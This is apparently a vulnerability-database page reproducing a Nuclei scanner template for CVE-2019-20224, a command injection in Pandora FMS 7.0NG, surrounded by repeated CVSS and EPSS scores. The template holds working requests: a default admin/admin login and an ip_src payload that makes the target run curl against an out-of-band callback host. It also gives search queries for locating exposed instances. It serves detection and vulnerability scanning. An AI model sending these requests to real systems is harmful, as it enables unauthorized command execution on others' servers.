Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-20224
HistoryApr 16, 2022 - 8:16 a.m.

Pandora FMS 7.0NG - Remote Command Injection

2022-04-1608:16:17
ProjectDiscovery
github.com
4

9 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.6 High

AI Score

Confidence

High

0.141 Low

EPSS

Percentile

95.7%

Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
id: CVE-2019-20224

info:
  name: Pandora FMS 7.0NG - Remote Command Injection
  author: ritikchaddha
  severity: high
  description: |
    Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system.
  remediation: This issue has been fixed in Pandora FMS 7.0 NG 742.
  reference:
    - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
    - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9
    - https://nvd.nist.gov/vuln/detail/CVE-2019-20224
    - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view
    - https://pandorafms.com/downloads/solved-pandorafms-742.mp4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-20224
    cwe-id: CWE-78
    epss-score: 0.18764
    epss-percentile: 0.95774
    cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: artica
    product: pandora_fms
    shodan-query: http.title:"pandora fms"
    fofa-query: title="pandora fms"
    google-query: intitle:"pandora fms"
  tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica

http:
  - raw:
      - |
        POST /pandora_console/index.php?login=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nick=admin&pass=admin&login_button=Login
      - |
        POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        name: "http"
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100db3898e8debc70333898a4da2e52f2298915516a6f94567274fb028bb9ed6f3a02206de19519126f12ff63151aa49dcd6299983aececf7464e25cb9640c8ec5836a5:922c64590222798bb761d5b6d8e72950

9 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:S/C:C/I:C/A:C

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.6 High

AI Score

Confidence

High

0.141 Low

EPSS

Percentile

95.7%